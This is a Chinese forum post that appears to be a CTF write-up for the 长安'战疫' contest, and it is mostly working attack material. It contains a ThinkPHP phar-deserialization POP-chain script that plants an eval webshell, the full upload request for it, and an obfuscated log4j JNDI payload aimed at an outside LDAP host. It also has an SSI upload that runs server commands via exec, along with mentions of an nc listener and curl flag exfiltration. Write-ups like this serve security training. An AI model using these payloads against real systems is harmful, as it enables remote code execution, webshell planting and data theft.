• 售前

  • 售后

热门帖子
入门百科

长安“战疫”网络安全赛-wp

[复制链接]
乐态思 显示全部楼层 发表于 2022-1-12 16:55:39 |阅读模式 打印 上一主题 下一主题
长安“战疫”网络安全赛-wp



Web

tp

文件上传+phar反序列化
  1. <?php
  2. namespace think\process\pipes {
  3. class Windows {
  4. private $files = [];
  5. public function __construct($files)
  6. {
  7. $this->files = [$files]; //$file => /think/Model的子类new
  8. Pivot(); Model是抽象类
  9. }
  10. }
  11. }
  12. namespace think {
  13. abstract class Model{
  14. protected $append = [];
  15. protected $error = null;
  16. public $parent;
  17. function __construct($output, $modelRelation)
  18. {
  19. $this->parent = $output; //$this->parent=>
  20. think\console\Output;
  21. $this->append = array("xxx"=>"getError"); //调用getError
  22. 返回this->error
  23. $this->error = $modelRelation; // $this->error
  24. 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
  25. }
  26. }
  27. }
  28. namespace think\model{
  29. use think\Model;
  30. class Pivot extends Model{
  31. function __construct($output, $modelRelation)
  32. {
  33. parent::__construct($output, $modelRelation);
  34. }
  35. }
  36. }
  37. namespace think\model\relation{
  38. class HasOne extends OneToOne {
  39. }
  40. }
  41. namespace think\model\relation {
  42. abstract class OneToOne
  43. {
  44. protected $selfRelation;
  45. protected $bindAttr = [];
  46. protected $query;
  47. function __construct($query)
  48. {
  49. $this->selfRelation = 0;
  50. $this->query = $query; //$query指向Query
  51. $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
  52. }
  53. }
  54. }
  55. namespace think\db {
  56. class Query {
  57. protected $model;
  58. function __construct($model)
  59. {
  60. $this->model = $model; //$this->model=>
  61. think\console\Output;
  62. }
  63. }
  64. }
  65. namespace think\console{
  66. class Output{
  67. private $handle;
  68. protected $styles;
  69. function __construct($handle)
  70. {
  71. $this->styles = ['getAttr'];
  72. $this->handle =$handle; //$handle-
  73. >think\session\driver\Memcached
  74. }
  75. }
  76. }
  77. namespace think\session\driver {
  78. class Memcached
  79. {
  80. protected $handler;
  81. function __construct($handle)
  82. {
  83. $this->handler = $handle; //$handle->think\cache\driver\File
  84. }
  85. }
  86. }
  87. namespace think\cache\driver {
  88. class File
  89. {
  90. protected $options=null;
  91. protected $tag;
  92. function __construct(){
  93. $this->options=[
  94. 'expire' => 3600,
  95. 'cache_subdir' => false,
  96. 'prefix' => '',
  97. 'path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-
  98. decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../public/a.
  99. php',
  100. 'data_compress' => false,
  101. ];
  102. $this->tag = 'xxx';
  103. }
  104. }
  105. }
  106. namespace {
  107. $Memcached = new think\session\driver\Memcached(new
  108. \think\cache\driver\File());
  109. $Output = new think\console\Output($Memcached);
  110. $model = new think\db\Query($Output);
  111. $HasOne = new think\model\relation\HasOne($model);
  112. $window = new think\process\pipes\Windows(new
  113. think\model\Pivot($Output,$HasOne));
  114. echo serialize($window);
  115. echo base64_encode(serialize($window));
  116. $phar = new Phar("exp.phar"); //后缀名必须为 phar
  117. $phar->startBuffering();
  118. $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
  119. // $object = new Windows();
  120. $phar->setMetadata($window); //将自定义的 meta-data 存入 manifest
  121. $phar->addFromString("1.php", ""); //添加要压缩的文件
  122. //签名自动计算
  123. $phar->stopBuffering();
  124. rename("exp.phar", "exp1.jpg");
  125. }
复制代码
写shell

shiro?

log4j rce
  1. POST /public/index.php/index/index/upload?FILES[file]
  2. [name]=phar://suanve&FILES[file][tmp_name]=phar://suanve HTTP/1.1
  3. Host: a6080904.lxctf.net
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
  5. Gecko/20100101 Firefox/83.0
  6. Accept:
  7. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w
  8. ebp,*/*;q=0.8
  9. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enUS;q=0.3,en;q=0.2
  10. Accept-Encoding: gzip, deflate
  11. Content-Type: multipart/form-data; boundary=--------------------------
  12. -139087197228008034012754605521
  13. Content-Length: 1199
  14. Connection: close
  15. Upgrade-Insecure-Requests: 1
  16. -----------------------------139087197228008034012754605521
  17. Content-Disposition: form-data; name="file"; filename="suanve"
  18. Content-Type: image/jpeg
  19. GIF89a<?php __HALT_COMPILER(); ?>
  20. �QO:27:"think\process\pipes\Windows":1:
  21. {s:34:"think\process\pipes\Windowsfiles";a:1:
  22. {i:0;O:17:"think\model\Pivot":3:{s:9:"*append";a:1:
  23. {s:3:"xxx";s:8:"getError";}s:8:"*error";O:27:"think\model\relation\HasOn
  24. e":3:{s:15:"*selfRelation";i:0;s:11:"*bindAttr";a:1:
  25. {i:0;s:3:"xxx";}s:8:"*query";O:14:"think\db\Query":1:
  26. {s:8:"*model";O:20:"think\console\Output":2:
  27. {s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached"
  28. :1:{s:10:"*handler";O:23:"think\cache\driver\File":2:
  29. {s:10:"*options";a:5:
  30. {s:6:"expire";i:3600;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"pa
  31. th";s:129:"php://filter/convert.iconv.utf-8.utf-7|convert.base64-
  32. decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../public/a.
  33. php";s:13:"data_compress";b:0;}s:6:"*tag";s:3:"xxx";}}s:9:"*styles";a:1:
  34. {i:0;s:7:"getAttr";}}}}s:6:"parent";r:11;}}}1.phpQ;�a���~x�|
  35. ��ϕ*�,m�8GBMB
  36. -----------------------------139087197228008034012754605521--
复制代码

curl 外带flag

Baby_Upload

发现shtml可以上传,过滤了一堆命令 flag也不能出现在内容里 但是可以打包 绕过。
  1. ${j${uhns:fnYS:-n}${c:yShJJV:msiqQ:BR:UKUHc:-
  2. d}i${CWnHLQ:O:CadPOP:-:}ld${QaaVd:pRdN:cMAUxW:dGUA:zF:-a}${bwWku:-
  3. p}:${dSVAq:HI:fqOXJY:lnmA:tw:-/}${LJsI:OHhD:mgE:L:KKqM:-/}${cqkdfC:Whgbs
  4. z:YHDJLV:-1}2${v:mJhJs:Ky:extESK:bpme:-3}.${GF:OvQTw:MtHR:I:-5}${hFWk:-7
  5. }${b:l:-.}${d:q:N:njP:-7}${pifPa:cxNupk:Rduy:mJeGR:-8}.${KV:-1}68:1${zOC
  6. b:lOlhLw:QsYntQ:-3}8${xXo:BknON:-9}${QQGNH:IsHHM:-/}${DG:jGiGp:LIbk:s:Gl
  7. :-o}${gk:jxlXtq:HIO:dlmdop:-=}to${uq:tkzn:J:-m}${BEB:yT:xY:Jfl:-c}at}
复制代码


flag{c62e7f0dd42546cc9a13b167d184cc3b}
flag配送中心

关键字搜索


其中origin部分即为我服务器的IP,在其他地方启动一个可以正常使用的http代理,如http://..122.65:8888/,附带proxy:http://..122.65:8888/,再次访问http://your-ip:8080/index.php,此时的Origin已经变成*.*122.65,也就是我们甚至可以伪造数据,在服务器下新建一个b.txt里面内容为
  1. POST / HTTP/1.1
  2. Host: 8a5ef041.lxctf.net
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
  4. Gecko/20100101 Firefox/83.0
  5. Accept:
  6. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w
  7. ebp,*/*;q=0.8
  8. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enUS;q=0.3,en;q=0.2
  9. Accept-Encoding: gzip, deflate
  10. Content-Type: multipart/form-data; boundary=--------------------------
  11. -23603960162831012392270557328
  12. Content-Length: 654
  13. Origin: http://8a5ef041.lxctf.net
  14. Connection: close
  15. Referer: http://8a5ef041.lxctf.net/
  16. Upgrade-Insecure-Requests: 1
  17. -----------------------------23603960162831012392270557328
  18. Content-Disposition: form-data; name="file_upload"; filename="1.shtml
  19. Content-Type: application/octet-stream
  20. <!--#exec cmd="dir /"-->
  21. <!--#exec cmd="tar cvf
  22. /var/www/html/upload/d7efaae655f6177619403045edc9ae32/2.tar / --
  23. exclude=/bin --exclude=app --exclude=home --exclude=root --exclude=run -
  24. -exclude=lib --exclude=sys --exclude=tmp --exclude=usr --exclude=var --
  25. exclude=mnt --exclude=opt --exclude=etc --exclude=dev --exclude=boot --
  26. exclude=bin --exclude=proc --exclude=sbin --exclude=sys --exclude=mnt
  27. --exclude=media"-->
  28. -----------------------------23603960162831012392270557328--
复制代码

开启监听nc-lvvp 1234

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作